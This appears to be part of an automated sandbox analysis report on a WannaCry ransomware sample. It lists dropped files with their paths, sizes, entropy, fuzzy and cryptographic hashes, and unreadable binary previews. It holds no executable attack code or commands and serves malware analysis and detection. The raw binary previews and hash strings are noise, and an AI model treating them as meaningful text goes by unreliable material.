                                                                                      Preview:+|kD.f....D.6)A..z...0."..x.3...Q.hnk8[..@l...Z:.O=..zO.f.=+.OJ..Rc0X+....*...A....# <%.~.(gW.. ...........wG.;.......|..U..p.. .f.b.s.j.z.....k.';..4......g....N....p........p\.r...).Vtl.|\NA.>O..\.r..}Q]s.w...[2Wg.7..H...._0.>..b.v`UY.........{(..f2u.{.....A.y......i2..@..z.jK.0. ..p&....+D*./rZj.Q.....Q..YH~..'..D...6...(t..D...b9;.\o.(..=.!.z^9[....."....H....1.t..Fe.E..\,..D...e{......p....gM.1....2..49z.5...O....U....i.]W.s.h...g.U.M5.......1xqhc......Q6....y....t.e.F..j..!...o6.J.Q..).....6:..._..tL.m`|.~...>g..%.G..].Y...bN?u.:.V!.h.Dn.K....L.0..HKW".V....P..A..D.3.I}...v........$.+3iNH.:k.......a...@W.a~..E.'.F..]E..)b.XsJ.1X\..@.........u.2.dt...N.[.Zn.LZ.6.6..H...W...E.8..kh....:.6]`-NC<....X...h..CYj. .......X....^.l.r..7fw...y.sWV.ui.Q..aQ...f........7.M.5......%.Z.]........1....+Y..TW.Pz:e.>{u.y.qF...Q.(...T.......K..!.,..)!..+%....ob1cd..rG...g..D."4..^z....[8..D.rem.O.n.b..M{.g....sn.<..P.....X?.........B.d....s.....i`-.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.82273988549673
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:HfNpWcxrv9fR67GiPDs1BKFQf2ytNcz5Pg0vKHigObpyr:/7WwU7GiyKqOQqP4Cju
                                                                                      MD5:598C5E0E6A59D1AE303D1D493E719DAC
                                                                                      SHA1:AF84416438AF7CE407FF5CB5B7BC18B3375A708E
                                                                                      SHA-256:1FA7A5E179B7C1C681A1CCBD00C5DC794D4E975681B0E5B7B297A7C53FA49702
                                                                                      SHA-512:2B82BA761A8017E87024CE99C642D6317603FF2836E0992C436BD0C932E630799BD37EB820DBF239FDEA8E481D4DF2833D4E11BF04A9B7CC03F2717B8024B1A0
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.?g..dX...^....zg{........[....t....T.!.g..2.^.o../w.............e.=...0..?.e@.d.]........a....!.2.Y{..)..~n.w...}..K.{r2._.T#..$p.nA3......>'Sl.......@p..J..bH.P.^|../.;h.[...]].?o..3..\...jzh....3..=y.?._...A1\.>X..t...>pp.'..}W3 P.(ax..\..-iZ..3....S..w.a'.\..$...`T..3....../'.N*0;.0.N.-...x.......FM.5..C..G......!.2..A.B.._Tp.X....O......D..d.A...xR.. ...xq$'..~..j..`.!t.O..F.6...2.M......6.@.n.G...6.....w.W...:....@S....V...z.R..^.Z".`> .A.l.H.~[.......?.7:.GuDQ.A7%^..6...D...rS...E.8...&.;:.#eM.8.B]..A.4(....2......d.~.qE..%.......^G....+...<....(@.4R.2...K.cB3....^...OhtI.E+(.].d..9..v.~_..`.F:y.k.3....GJ.........mR......;BX.X.r..<..w............U..p..3e..d....y.M......4.j1w&.zG*FH.9.H...vt.E....<-<E@U?p..{~x...;.n.....&.p..I....c:?.0....b..'J.+..#..KoY.}..{........mO.{.J...)...H.H.r.}}...K(.j@p.]E.q..m~.,q.P.....f...`.k...Z.4/Gw.4}h...v?.v.qj..... .N.'.*.......Y.@.%..;U...-rM[.V._.....V.....P...kY..._xrA.?....).(m..P..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.830965693114331
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:arEpk7/T1yEFxj6EkBGuNqgwiLM1eX209lNJgwWj7eCXD/bp/P:aYpk7r1yEFxj6Ek0TOMkm8l1WFDF3
                                                                                      MD5:9D840553F652859B4738EBA4D5DDCECB
                                                                                      SHA1:A36272916C893BB95A26BDC37863D91939C7ECDA
                                                                                      SHA-256:C4182400E00C75D186E3815FF69A278946B7B3391495144B21A10F031199A850
                                                                                      SHA-512:6C0C51A5F74F824104911332F62BB6AA2FD459C4B4FB48E853838A9F9BDD42A4E6CE2C09F70F9ACD0EFA29A7B07609C1DF6A5A56FE1E1E28E9C57C398CF3E76E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:...]{.I....8p..j.......H..(bi]....2./N.);.d.C.N..r..6...QL.,x..{..WC.x.!Mw._..&=v..2ms.."G6..8..Zd.2z..l..1@.3{.#...g....Hn..t..Y.R-...x..R...xpy...&D..(nf%.....U...iT9n..gH...e.0IsA..^...$...._.Pm.8..w.IIe..EL.k.%.".........G^..'.q.U.....W..K.:.1%....)...h.....!.F...+..n..^aj.P...j._...M...r$9(.N..1...G.[Aw(.Y...l..-..|.]Q.+.....z..?h#Xn...'~...l~.p...!.0!..`.....)KeWk.t...$...9..Ut.n..X........gd.3..H.y@"j.....I...n*.....U.u......c].[..V.n.0.a.A.O..`)f.;.. ....I.)aT......R!....F..W.`...A]...!....;LW..c....[...-d...JiH.....+.C.'(&...Z`.l.m\....{%yq..X..w.@.-. ...-...Ue.(G.)..!...6.@A.....!.*~....=|...G..........:?....=_.....~hn....2..T..iaX~.u.0E....'.......5....<...+....E.lU...Fs..O y./.h.u..8G...d.A...l.w.d..i....+'.(e... .E..}...6.t.%.au...Uj..h.....=.....D.3<.....[j.3rV!..Pz..[.!.u.6..",!.F(...G..0Y..r....O.NI....>....T..4.$By.|..E.E..TG.z.'.j.5.a..).Q.4c..C.p.W#...:..9..b..`..f. ......2.,....s............f.O.[.!.P^..{....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.816282907630795
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:mf4tTlm+H9kUKdCP/LjqRB6i/I/BM2XLpU7VwGHlOiUEFUAj:lTlJOUCCnLjMpIpnbpU7zlOiUEFnj
                                                                                      MD5:4CA2864580AF180D4A7F3E0D55E56001
                                                                                      SHA1:6E51DB5F96120F7AC27DED7E978655E7FC572A47
                                                                                      SHA-256:F1978364577F21D4BA1BA422702943DD4A9ACB62A9957321C82B2712C2DF1EDB
                                                                                      SHA-512:6F232EB08E3ACD1D8A9E1A160FE8787456697E670A1AA9DBB2D7CEE2BD75B1CCB7FE2908E4B9068388216AE68C26150FCA3C0D607AAFBC24B786116E52F34C21
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.b[T5..o>q.......W,..zU ...?Via.s.B...L.T....u1y.~.Hra;.....Z...2.4z.2..S..X1......;....... .s..hi&1...fed..]u..{.k..hW..y...:...Nh...}....W8..E X....X!.........F..M........!..<oK.?.....40.=N ..AR.p.,.....E..A.0....a.A<..\MCM.m...g.|...1JI{/4....y.....Y.........[.yE.:5...4.....6|7......>......t..8....jV..g.......?.3....z.j^.A..s|...K.II..I....a. ...V...._*.,....H..7...o.v.....m...hX0.mt5.....D.#....\.P.y...5....q.oo...c..^S..h.....a.T^(...Pf .`[....N.......#....P..ajO...~;.2..\..*.b...K.L...@.}?#JQ...S6..iP'B.E.........;wS..A.A.U...wE.5.....s..ghhL..".[9<..K..G...*".p..z.8.~T.%......H(&V.\.....bO.8K.7?.'q.......e.`..<.j..."aZY....hm.k..Z.q..(.s..^.8...y@..0G..._S......%.[S..$...i........-\...EF..-.;...........5h.x_......y[.Cj.).h.]./H)@.Z...g;.$q.WY!2.q.......,...y..}{....Z..........U*......V.....1.......:...S..f[@H...D..u.n..@...!Jt-w$.,.,.=_L.P.}._:.,L.."|I....J..x.X]..0yt..s.3.L..h.......'...&i.is.b.......#.....K.E............l.j.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.827171585958686
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:8x6wkG2VBSFATeBz2fATxY1mmIoqovTriB1RWGAt3qqpCSe:su/eF3Ta1mboqEriB1kGE3qaCF
                                                                                      MD5:82AA94B08054AEB3285EEC0D18CD4C4B
                                                                                      SHA1:82F147F512DAF1AB211B94DCE7EF746D18AC6DA4
                                                                                      SHA-256:4BC28206CAFC7D07DB7E136281944A60C7C2F3F594FE4028D3E4C3BEAEE2E2FD
                                                                                      SHA-512:1642992E9B897E3F441802BC293F72221F6E3465BD65AF869953832E5A2DF77B84044AE6F212DE773B655F764FA3EC8B892F5295F08C4C7C9779490BADD5D85E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.`.Bn.4...6O...g......(........x.^...d:o.Y._.4....x.h....98.6..CD.G.-4.*h.3....x..[....Y.U{.k........O.M.1...D.K..i.~..G.D..!.....&......T.n........(9......g~c,.*#Iu....h...PH.....;.......n8.[\..Y.V..2GA.3I.e..g.e...0/X..o..[f....yBt.n?..m..V.[J|.q..h......{J....0..#h....i.H....,..r.8..iA...z...eO...A..`_...o.*..Qv..Y.....S.....\.`,.....z.=r:.....j.G....lUe,L.......p...^w.hUl.W......Vg.C_....t...".2..c.%.*..B.i,w.L.3b.....(..._.Q..nQ{.B.1.Y...Q.]....CC..l+`a.(....7J..@W..........T{..J<[..0.....'!.........d..RG8=4....!HZh......7.....[c....o!...&w. ........P.>..$..u..!a..g4..n.......'.......5....e........#......f>$s!MZ`.+.K-.......-.o.4...]...9..)S69B..V..Rb .U&FV.^..Q..... ....j..^W...h.Kr...K.E.3.'=..ko.!H.7S...1..YC...X.W.2...............;@.E...j<...I.G...e..n.})..)...0...(.)$..N...t.m1. ......B...h..+t./S..hgFe"{#..[....;.....L....S...).2i9...w...n..N......E5.6.....6z...@.s.....:.@.7....KQz...{.%e.?...+o..j.R.W... ..KJ..[...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.804449043721534
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:TyNkGZJmCrWit7eQhT9IXhK7fcSVIzn40Y4pqj+jivaN:4JZJmCr5tKuNfcS6k0Yz18
                                                                                      MD5:46D541B24994E81C80D176EF0CD878BA
                                                                                      SHA1:7AC25DDD97F078340DFEABF6906054936858BD78
                                                                                      SHA-256:B949247D819932445AE5B4B44809369C2612742EFB7DD4B0A229C453BEB2A7FF
                                                                                      SHA-512:75D66994AB5CC77489EA93A8397AA4D3AE2C5ABAC84D9793BD71DA0AB4A525F89D37B2ED694C23DE935B5E2F36DC11691326B52E77E02F21B29C95E58CD37E9D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..E{m*H.........t9..].79.|&.....G}0q...{M.U.%.2.xZ/...>.W.....H...1..J{[EL[...H.>.<..9C,...W.Ao..[.k..-....yK..r......j..'B..CN.c.d't..^.b.SS...........l`.3z.EH.A.....Ts^..9...^.q.3$.p.P..f@.....c..EbV..F.."......j...%.p...aS.......&i.*vhU..z.T..^..k...\.........Kdh.U$xZ.UQ.U.,.....A,.rF{.HXbK.(2..3ol[....8...g.".E.;vr.......yp..."*.T..a.....K..<..^..5\.}g4.]]<d....DG*.Ks;t....2ws.+|...>.N.......@H...f..g.&.hR..o...p... /...A...0@).au...X.4:t..Z]..$....{.}...18.jN..2...D..B.O..A...^s..*..1=....uS....9.L..c.d}:>Hy....%k...h-R.@.I"..)mrip.h#. .......|.5.t..........TB.<;..oR..P<e..Rw.l....k....K.*.....1.?D.^.Xi...#2..........[..... ....S...o.F.3.Sk.<...zn./.. .@I.R..t....z.].......!.k..i...}.z.......&+.d-.......fPg&...Z......I7...C<[._.....7...AUM.....>..!.:.F6:.}i.."H...3.^...Jjl....'...ZW.......)C.G...i..{... a.]....*.Q.......i.?.y....V.h.0S_.B+.9.&...%..k../..X..oq........,..4&R....N..6J....]....8.uT..HM..K..}y...l.W}.{...K...3.r\.b..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):3481589
                                                                                      Entropy (8bit):7.999940457163727
                                                                                      Encrypted:true
                                                                                      SSDEEP:98304:vhvb2BVmAw0p9jIVcEj5nnZNRyA30yBSRT:vhvq7Bu6EZnZN5EyBSN
                                                                                      MD5:EFE76BF09DABA2C594D2BC173D9B5CF0
                                                                                      SHA1:BA5DE52939CB809EAE10FDBB7FAC47095A9599A7
                                                                                      SHA-256:707A9F323556179571BC832E34FA592066B1D5F2CAC4A7426FE163597E3E618A
                                                                                      SHA-512:4A1DF71925CF2EB49C38F07C6A95BEA17752B025F0114C6FD81BC0841C1D1F2965B5DDA1469E454B9E8207C2E0DFD3DF0959E57166620CCFF86EEEB5CF855029
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:PK.........[.J.."@..5...5.D...ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeUT....i.Y.j.Yux.............c..|.!9....T....I..^.Z.@.$:...-.h...*.. ..x{&:....a..........D~&....^A.@N.....(.b..U.a.....f.N)./?...e(...34#.......R.......[).T....Zw.@........?..dsTT.u..PM....qy........@.C.....6..........?./#....BB.....Jq..Gp..`C(.i......m.......b1.q..p.....~...1N-....e...F.O..EWFH.@;..q....E.!!.=.dUyM_hl.[mb}...=..?.bx._.Ey..;.F>.S..G....,R.3qS.:."....QD..........C..p..G6rS.[....~m...s.-..i...O....1N..K.A.M._-|. ...7..~.H*.p..s)C....U.EA27 ......7..$._R'%....7.#....UB...sj....F..O.8.x....^n...].4..yO?..*|..Mdq..^...!zj...2.>{%.F.....?S...8..+.4..=X~.C.<.Sz...42..f........O.-.u-%B.....}~....?.i..D.........Oi.sLF.............. ?.}..I........9...I.E.Z..*(....../.....L.A..Q.%:....&.h.>q.gj......U.Fc(..+m.,.U\u0.*.......B.jNy..Z..h..@...9A}[....#............F.,...e.0.%....w.H.e.eV.7.......9.r(..4.......`..83l.Fx...]X...ll.d........K.l\.E
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.800781535101533
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:eFWcetJSk1s0q0RN0W6ePGBH80MvZPHsgQHM7cimijATj:eFWc6JSCs0ZL6ZHC3nmi0v
                                                                                      MD5:4FFB44CCAA0C22C95C80EC1A32B13FC5
                                                                                      SHA1:B54C96CC4CB2FBA05A6B6158E8582DAB51ABA2DA
                                                                                      SHA-256:E5E66D262329B276B06FCC7021098BEE7609C92698893C926DB035387C222E2F
                                                                                      SHA-512:6D0E5664890F139554CCDC371C1ED36B40929DDEDBA06CFFC04973419D0E74F615E3DD20A6D0A243C834EB21067C6E60504862B94525EEBA529EE2E1CDD174B7
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:...j..i.u;...O.=?.....ZV....T'>..GY.d..Z.Hj.z+..oo.VD.d..o..p.=Pu...c9l........'...2O...Jtv..y.&..n.}.d..9..t]..FR.x>HM....&...3.Bx....c.e.Df.Y....Y.u....O.g.f).TP.....JBIv.Pe..:-h.\]-E.[-.....h.CO.....n!...C..0..p)..|Y#..HN...X.....-...j..,.|.N.]...((.`.7....eaN....**tR~..,B..6.Z.......6).A.c...t\p..X.D....-..1.|h.a..:=7.Kr..r\.G...LM=x+.`..F..K.vE.........N./....&...4\._}.5.......u..7f....-G.C.....=E+.n.Z...U+.....q........J,z:wc...<.Q...8M....t..`m.."-.L(d7.(.*o;H..%{^..]r&nER..X.E5...xh.....umL$.Er...X.Z..iEo.k.=...5.@.G..:w......A@g.R...#..W....-........d.......&..h..9.*...v.....o'.."L.9..m.y.x@M......Al....G...E....9..(_...T...nO.q.wxS.L....Y[f4..4....LW.w.n.>...\..3....*..3f....f.S.ZK,(...`.$.......I....@....i....yB..dG`..+..v.g.;XA.Q'...."nU....T.;i...4..[.:3....&...J]4...9]...[B]q....4...,....umG<...Ex.c...n.;..pG$..c....T,v....3d^....".twU...)..t:*..%.U...[.e].d.h.Fx......s._...^...5....!.rg<.(.hm_....>. ;....%m*...eFW...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.809562261712615
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:VS0zU5/Io56E9HOwLCFrffdA/G3DBhziqQ:Vb06sHR0d/XziqQ
                                                                                      MD5:339E86D140FD3A0BB2FB0277B8BE24D6
                                                                                      SHA1:387AFCF2C5D688832667E9CF7B8CE9364C05BA21
                                                                                      SHA-256:95F51DAB7A47F429B70685BEFE7C488E276A2E94EB3D9E85A6DD0990C847DC5A
                                                                                      SHA-512:A4FCCC46D152D38B687E15F07C6E9DA4AD9D42D16FDD6C407BFB3A6F9757A4460A319E4EE8D16AA2B446B096F0F4298DCBF7695D463E424D06A11678332B30DE
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:N..|o....X............:T............s %8.....,.6.e...^.Id})........G.g.]...0i.}z9{.1ytB....T.(...n.....4....Q...(69.=\.e..#=.......f|c@M..^7.kv..c.Z..4...`._<..F4.s...A.,.v..5...f<...N...%..1.~..d...Z....?.O.:..x.DO.._.U7=.9..._..D.13.1*..c..6.J.d....#...4.=7^.W/Q...`......(.>\....T....2..T.V.|..../..gT..*.I'i.....&.?..v......m..p...`%..Jv..6A...V9..Yp=...k.u..{.a`...5.|...3.7....pO.........NF.C;..9..%3... ...:.....O.......S...s.l......q...e.0D.:....W..:..P.`..cc.{..+.a.v.F..:..i..0 .7$..Q.Sr....d>..8.u.......rvg14\..4.d...8.....)S....*bT.D!m",..Y3I..........8.../...{.....b.e.Q....+..Y..p.;N..L...Y.......lb....V....0..M.}.=...j.q=....r%..Wl......-)...o..{i../.9.Y.*)..g.}y.I.Z...)....;U..L.M"J....^...Gu....#p.".rP...~.....|#...B....S.Q....2........q..r.|..Bf.(W....>...::.=..O.^.|....vG.$......^..(M7E..................~.5..*...`....xVw#.FL...'B..4.W..../l.....f.....}.....q...........5.......z.f8.4.|...l..1,t66.[j...q.~....%......;%S
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.848932606698107
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:mf9OqfFMtdMikmdUOcAMqlIrCSiEgTfdkktDRn0LPfIJ:uOqfFMpdhjdkCSX6dkkt1k2
                                                                                      MD5:AB5F33E0BDF8CA86E9175EB8E04D9613
                                                                                      SHA1:F112ACF8E38A11A7983BC39B50E266AEA97FEE7E
                                                                                      SHA-256:CC5917DCDE866E510BD4A5753924F677D5A0371DC15B99C831AED8C98AEB9E2F
                                                                                      SHA-512:4D6788AFDCEBDDEC039C4F3DB9261983A40F2D769BF4390BA42CC3E05E7558716ED4E46B86A6573D5988C13F47D5273AA5615024FB0702FE8D80E04C8DCA3C1F
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..(f..?:.u...v')..._..$^.*.H...U..2.L[dw...x..0..ZX..S..WK.rc.".z.{W..UHMr.JT.......VJ......;..]h...N.o..)\.....5....R..G....7.....r!&.i..~L...0~GI...)7...[.....WAZ!m>..g.#$.SQU...c6.eJ`k..........`.W6.?....6(..OQ.|j.xj..B..ZX.Yf......Q..2vh.H..c..Mx..lP.......gy...:.h:.F.E...|v.r,..."...O.m#.Z....W..2.I...6.r..H]-\/..gW.!.k..1.Ra...a..0J..6f.Z...@pV.'.C?.exFX...2M..D0]c...5hfC...._4...t......x.lq...s...;vN...g..I.ok.[..&....S........Q.l+.5JRc..[._.A.0^4.1.P.`.......SX..T.E....+...h8,.S....=...a ........g...Q.aH..S6O.p.|,...v.....I../..Y./..L_mSwv..:D#...?.1J,.z....Z...Pm.)...].v.~kTj..5*@..%?.7<.v..AP..hi.3....!.#..@.B..P.`<!a.i.~Q.:4P.6T....?..lS.x..,G......o/P.[bq....4IA.......t..8.].,z7...YPe..#....8xg#3m.....q.'.....@9..N'..V.......W1..b.D..L.,.wY.=OW...x!...'z.-.....W..J<..|..~.R.B...n..( .M\.T....JN9S...2Qd..x/.b.v.M.........O...q....:...a}!H....".."gn.....d....x...l./.s..8b.bTX.."h&...(...._.m`.BJ...o.W.\..Z.@.+.$m.0..0.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.825031617480904
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:s97DnSG2oEXy5CITiiV46q1b+q/wD0V5vx4GZyp1L7Uafko5xzR:s9vnSdKCIWiVtqRoYnx4v1vUaso5hR
                                                                                      MD5:40026D0E4FF1153A54CFA3E86E4247F6
                                                                                      SHA1:A2CBFF249373514FA73049143D50EF4116606E62
                                                                                      SHA-256:CFA1A0E09016D41C48D221F04E1028E3C704D5284028BF9FC2BEE08D91407B68
                                                                                      SHA-512:585915EE171144FA5EF9C0CBCE8CF5456221DE86031A85BEAEA761E3C1AAD088567F13EB6569F069AA5DDB52F6EF7C2A2893B26973A6F45DB39441C1786644E8
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:e_@..n.......".H.Z...%..w..z...<W......{...c...m.D....,;..9..8.#z....(.D.. ....e...-m....R.l>......*........k@O}n@u..@....V..u.......!.r{TB{.u...-..E.VW.o+...?..\..lL.'o...#./_.....m;x.!zW{2.C~.\mA....C%..._+..-..........b7F(/...haE=.3{.<.`.....D.....M#.....;...XIt.#..5..*,..e5..;d.......j.N....C.../.{S..0..5*.Ln.<....o..(.<.o..._..6.B..P.X..0L.....%.85.Q<.#W.t.......&.w0...Z.\.t....8..UA........HW.<.h...rf.s<.iH'.@W&...0.o...M\..D>[..jU.$....#..&.b..u=...'...e:2..j..O..D..D..J...H..........-xm.:iy3nr.Dh.;....;r..&....)../s#....T..s+.-..G..(\.g..?O...E.U.s....d)u...\v.^{].a..Y.....i...A.".c\F.=.3....#...)S(..0n1...\.m..o.....f.r`.u...uAy....q]......>..?....Z..,.N%.:.Ox.3M..m...QVq..M0.....Z9...b......?B<.......!d..C..Y[...~KD. ..0...l9..k.$Z.G`7Z..c.:..o..v4)6,.L..~...[..._+..8.x&..\0.uf..",.,%..~.D.T..C.n.:;`..._.n..o..hR..f..F~..?.Td....:..........m..<YJ.I.^..IsOa...j..Cj..g....T~....x.>...<.T....K.k6df1-.$..+.....Ra.73.i..7.3lG..1....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.817650891199994
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:cvAu6Nw/nJ4aSchXfOAyiXwlt0auYu3+TTuJFbmNY:pSnJ4f4hy0wL0au+3Q
                                                                                      MD5:F148C071F58E6C6FC2920AB2B74A1A2D
                                                                                      SHA1:C2BEDE846F5B6B9D53E535FBC8402DA766C0748F
                                                                                      SHA-256:B8449A29B7EB8BB96D92ED1E209418FF36CC7A1A5F03D392E7A0F375912C1508
                                                                                      SHA-512:A17CC479BF3F2359F17EBA846366A741EEC3176A7928D36D8697CEF7253A358D1705A7540628172C7FCF56C113FB41468D3A27EF535B4D95706C5F0CE712E3A5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..[..>.T.D;.[....1:[.B9bk.D......-.....+.iqIt.....\.V..',fo96....!.sC...-...3.P....uF....Q.._..T...8.i.RAI...7..rM.O.E...%.....i4.t&...9s........6^..[[.G.h].\+nr..J"<y..d.5o... .U<8.E...;.f...?(.y...m...H$..s..2I..o~....`...p...@.2..:.....y....F.=.P....(.):..9......hq}.x./P........l....L.Q.b.[K...R.&..c;8d}h.r...9a G{....w.L,...E.3...d.n@.+..%...u&...5...0...>S.j..V}n.\.[.........t.w.g.51-m.d-....Z..K....ah...E..}:[.J>M...c.Sy...<.Ag......7....H...>...k. ..h.q.e.Uc.wZ.<..y.....g...O.W4....F.......WD...Jt&..'.;...~...(.JZUyd.R.2.iK..OO..T :.u\4.s.C..p.......(=.B/j|.$e.G.A.=.".....t..V:..Y...{...F%sh....dG.F...n"]S...z...'..DD....c....#..%......0.S...Z.3F......ZlCb)...v.|C>^-...E.E./@.-8.....&x....$......aTW..)k.......A.U.JPW6YR.Bq...Z.:{+g'........[!y.E..g$MM....k..{.T.t.^..t...H....m{.5.......9...TQ8....mq.</.o.V...|..G.,.........=..+8.M.@}8O........B..u.R..{7.......Ls...........}@5......H.v.d...S.[<.Pn*....".v..\hU.W;.e=..m..h+c.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.802399192355314
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:4LTYswbP+t8aUJM99lH5sNoR3Vfa5zRPokIFLwI:40XbPcXqkgo/aPokA
                                                                                      MD5:2ADCC3A49038C3F247CCED7036A72130
                                                                                      SHA1:9080F68269515E1D0CBCB66EAE65C02A3B13A91E
                                                                                      SHA-256:A3823ECA9041EEAF680CDA2287CF1864F17BA170A2212CD0AF0A95B516A29055
                                                                                      SHA-512:2064D4B1C3703C3FAA439C417F663BE5DD84EBA25A9F1127BC1F3CCD4D70D852CD460982BE99127C6A4C800016E5C1597FB607B9AA8204911E958D2D74C3BC79
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.~......9<2.......i..p..D.H..%8........8]4L.!J.?3#n.m....\oC....+9....|..".y5@.yjF7b-b...{...>s-?.>.-.C.....K.upi...A..}H....~....e5.B.`....x..?.#.6.9...1.B.b............K|.g..+.cY7..S........J.Q.m@o.Y....3!.....Q.\....t..m..|..a....\V../.8.....[.>.%.g\..C.[.....^{m>."..i...y.....>.+.s6..{..[..D.Q-$3.!...9.....4{.....&..-C.r,m..m.]h.*....R:#.ra....S......M..2{....U.y...$.......8..mNw.....ws.=.....D....v....u...v.....D#P..'.J.pw.-Y.M....{nH......#1..|....6.q..[.:....a/.CP..=.jm....../.H........h.yJ..N.m..u.....2..(....l.&.aS.uH..o.......`..c.n...?......*5R..b.TT.Hq.g.K.y 4._*........7.8/:...g.g..:..B.Ul..64..e..N.n. 8...E.y8.c.....-p.+.XTJIo..q.!.r..ce5..P...N......a|...&P.$.4t....K...a.^..8W..-..e.`.F.9..u._..R.(..~..;..;J1Ye.9..........X....X.t.7.....G:.....B~..N.S(..=...n..[.0.M{v.O=..i....8.IX...q.2..\....-}#.~=..1....:..t>m.,u.qu}.@.x8.m..+A.z..l......Tf.E.z.G.p>.g.....<g.....).n....V.G..&n6.^..'...mg:"..).R.hO.KYc..G........._..i.P
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.842917779275005
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:nSW4eIOQlI2A3Dz4iYJsDv1eOBMZ9sBxi5w17jUkzuBhPCq7nEfF9j69hFKzTggI:SWRQ65wviDteaM617o6oXu/grLNlc+
                                                                                      MD5:F8BDA750877B715854921671A1B1BC57
                                                                                      SHA1:23B64A633982476910D33F9F174A43F23B1EBF40
                                                                                      SHA-256:8C562E83586D24A26065EB5BEC9A336CA3E3F5E5AE7DFA0943E99FFFF1E2C779
                                                                                      SHA-512:E2F5868F85FDD3F07DD9354E7EA06A9078D9B85DF69B4A62C25A4588484642D2E7CD209145AEB77139051DBC5D5B83BFD2778374F11355E92E4D6058D8B57464
                                                                                      Malicious:false
                                                                                      Reputation:low
